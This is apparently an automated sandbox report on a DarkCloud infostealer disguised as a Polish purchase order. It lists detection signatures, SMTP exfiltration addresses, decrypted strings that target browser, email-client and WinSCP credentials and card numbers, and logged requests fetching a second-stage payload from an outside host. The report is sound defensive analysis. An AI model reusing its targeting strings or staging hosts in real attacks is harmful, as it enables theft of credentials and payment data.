Windows Analysis Report
PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

Overview

General Information

Sample name:	PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe renamed because original name is a hash value
Original sample name:	PO-Zamwienie zakupu-8837837849-pl-.exe
Analysis ID:	1541129
MD5:	934ab81ba50dcd526fee8d8efbb7a216
SHA1:	7e2e6ab92ba2f6158db445daf27df591ae9744bd
SHA256:	11d1a478267e0ab5df63bcadadae555c683c94e66df9de87084407c48d439519
Infos:

Detection

DarkCloud

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Sigma detected: Drops script at startup location

Yara detected AntiVM3

Yara detected DarkCloud

Yara detected Generic Dropper

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

Drops VBS files to the startup folder

Machine Learning detection for dropped file

Machine Learning detection for sample

Sample uses string decryption to hide its real strings

Sigma detected: WScript or CScript Dropper

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes or reads registry keys via WMI

Yara detected Costura Assembly Loader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
DarkCloud Stealer	Stealer is written in Visual Basic.	No Attribution	https://asec.ahnlab.com/en/53128/ https://c3rb3ru5d3d53c.github.io/malware-blog/darkcloud-stealer/	https://malpedia.caad.fkie.fraunhofer.de/details/win.darkcloud

Signatures

AV Detection

Found malware configuration

Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.raw.unpack

Malware Configuration Extractor: DarkCloud {"Exfil Mode": "SMTP", "To Address": "info@asterilpanel.com", "From Address": "purchase01.qualitydevlopments@gmail.com"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\FieldNames.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: Cookies
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: \Default\Login Data
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: \Login Data
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: //setting[@name='Password']/value
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: Password :
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: Software\Martin Prikryl\WinSCP 2\Sessions
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: SMTP Email Address
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: NNTP Email Address
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: Email
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: HTTPMail User Name
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: HTTPMail Server
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: ^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})$
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: Password
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: ^(?!:\/\/)([a-zA-Z0-9-_]+\.)[a-zA-Z0-9][a-zA-Z0-9-_]+\.[a-zA-Z]{2,11}?$
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: ^3[47][0-9]{13}$
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: ^(6541\|6556)[0-9]{12}$
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: ^389[0-9]{11}$
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: ^3(?:0[0-5]\|[68][0-9])[0-9]{11}$
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: ^63[7-9][0-9]{13}$
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: ^(?:2131\|1800\|35\\d{3})\\d{11}$
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: ^9[0-9]{15}$
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: ^(6304\|6706\|6709\|6771)[0-9]{12,15}$
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: ^(5018\|5020\|5038\|6304\|6759\|6761\|6763)[0-9]{8,15}$
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: Mastercard
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: ^(6334\|6767)[0-9]{12}\|(6334\|6767)[0-9]{14}\|(6334\|6767)[0-9]{15}$
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: ^(62[0-9]{14,17})$
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: ^(4903\|4905\|4911\|4936\|6333\|6759)[0-9]{12}\|(4903\|4905\|4911\|4936\|6333\|6759)[0-9]{14}\|(4903\|4905\|4911\|4936\|6333\|6759)[0-9]{15}\|564182[0-9]{10}\|564182[0-9]{12}\|564182[0-9]{13}\|633110[0-9]{10}\|633110[0-9]{12}\|633110[0-9]{13}$
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: Visa Card
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: ^(?:4[0-9]{12}(?:[0-9]{3})?\|5[1-5][0-9]{14})$
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: Visa Master Card
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: mail\
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: Foxmail.exe
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: \Accounts\Account.rec0
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: \AccCfg\Accounts.tdat
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: EnableSignature
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: Application : FoxMail
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: encryptedUsername
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: logins
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: encryptedPassword
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: purchase01.qualitydevlopments@gmail.com
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: http://schemas.microsoft.com/cdo/configuration/smtpserver
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: http://schemas.microsoft.com/cdo/configuration/smtpserverport
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: http://schemas.microsoft.com/cdo/configuration/smtpusessl
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: http://schemas.microsoft.com/cdo/configuration/sendusername
Source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack	String decryptor: http://schemas.microsoft.com/cdo/configuration/sendpassword

Uses 32bit PE files

Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.132.193.46:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.132.193.46:443 -> 192.168.2.5:49717 version: TLS 1.2

Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2112093538.000000000342B000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.0000000004068000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000047E9000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2124472344.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2288985162.000000000321E000.00000004.00000800.00020000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2306805654.0000000003EA7000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: W.pdb4 source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.000000000412F000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2112093538.0000000003539000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.0000000004227000.00000004.00000800.00020000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2306805654.0000000004018000.00000004.00000800.00020000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2288985162.0000000003317000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3304177579.000000000045B000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2112093538.000000000342B000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.0000000004068000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000047E9000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2124472344.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2288985162.000000000321E000.00000004.00000800.00020000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2306805654.0000000003EA7000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2123399550.0000000006CB0000.00000004.08000000.00040000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000047E9000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000045DF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2123399550.0000000006CB0000.00000004.08000000.00040000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000047E9000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000045DF000.00000004.00000800.00020000.00000000.sdmp

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /ruurew/Cwfuvfaf.wav HTTP/1.1Host: erkasera.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ruurew/Cwfuvfaf.wav HTTP/1.1Host: erkasera.comConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 162.55.60.2 162.55.60.2

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

May check the online IP address of the machine

Source: unknown

DNS query: name: showip.net

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49705 -> 162.55.60.2:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49800 -> 162.55.60.2:80

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 7_2_004329F0 InternetOpenA,InternetOpenUrlA,InternetReadFile,

7_2_004329F0

Source: global traffic	HTTP traffic detected: GET /ruurew/Cwfuvfaf.wav HTTP/1.1Host: erkasera.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /ruurew/Cwfuvfaf.wav HTTP/1.1Host: erkasera.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Project1Host: showip.net
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Project1Host: showip.net

Source: global traffic	DNS traffic detected: DNS query: erkasera.com
Source: global traffic	DNS traffic detected: DNS query: showip.net

Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, FieldNames.exe.0.dr	String found in binary or memory: http://127.0.0.1:
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2112093538.0000000003061000.00000004.00000800.00020000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2288985162.0000000002E51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: InstallUtil.exe, 00000002.00000002.3305635075.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3305781323.0000000000CC6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.net
Source: InstallUtil.exe, 00000007.00000002.3305781323.0000000000CC6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.net#
Source: InstallUtil.exe, 00000002.00000002.3305635075.0000000000AC1000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3305635075.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3305781323.0000000000CC6000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3305781323.0000000000C78000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3305781323.0000000000CDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.net/
Source: InstallUtil.exe, 00000007.00000002.3306652645.0000000000D0F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.net/#(
Source: InstallUtil.exe, 00000002.00000002.3306426620.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.net/%Y
Source: InstallUtil.exe, 00000002.00000002.3305635075.0000000000AC1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.net/;
Source: InstallUtil.exe, 00000002.00000002.3305635075.0000000000A97000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.net/X
Source: InstallUtil.exe, 00000007.00000002.3305781323.0000000000CDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.net/dF
Source: InstallUtil.exe, 00000007.00000002.3305781323.0000000000CC6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.net/h
Source: InstallUtil.exe, 00000002.00000002.3305635075.0000000000A97000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.netF
Source: InstallUtil.exe, 00000007.00000002.3305781323.0000000000CDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.neta
Source: InstallUtil.exe, 00000002.00000002.3305635075.0000000000A97000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://showip.netth
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2112093538.0000000003061000.00000004.00000800.00020000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2288985162.0000000002E51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://erkasera.com
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2112093538.0000000003061000.00000004.00000800.00020000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2288985162.0000000002E51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://erkasera.com/ruurew/Cwfuvfaf.wav
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, FieldNames.exe.0.dr	String found in binary or memory: https://erkasera.com/ruurew/Cwfuvfaf.wav1B4MrP3veGRoRMM0tnPgU/Q==
Source: InstallUtil.exe, 00000007.00000002.3306909563.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3307042263.0000000000D5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fundingchoicesmessages.google.com/i/pub-8790158038613050?ers=1
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2123399550.0000000006CB0000.00000004.08000000.00040000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000047E9000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000045DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2123399550.0000000006CB0000.00000004.08000000.00040000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000047E9000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000045DF000.00000004.00000800.00020000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2306805654.000000000461F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2123399550.0000000006CB0000.00000004.08000000.00040000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000047E9000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000045DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2123399550.0000000006CB0000.00000004.08000000.00040000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000047E9000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000045DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2123399550.0000000006CB0000.00000004.08000000.00040000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2112093538.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000047E9000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000045DF000.00000004.00000800.00020000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2288985162.0000000002E9C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2123399550.0000000006CB0000.00000004.08000000.00040000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000047E9000.00000004.00000800.00020000.00000000.sdmp, PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000045DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: InstallUtil.exe, 00000002.00000002.3308084634.0000000003660000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3305635075.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3306426620.0000000000AE4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3305781323.0000000000CC6000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3306652645.0000000000D17000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3308180421.00000000038D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-L6NKT5G6D7

Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443

Source: unknown	HTTPS traffic detected: 188.132.193.46:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.132.193.46:443 -> 192.168.2.5:49717 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000006.00000002.2306805654.0000000004018000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000000.00000002.2118042555.000000000412F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Writes or reads registry keys via WMI

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
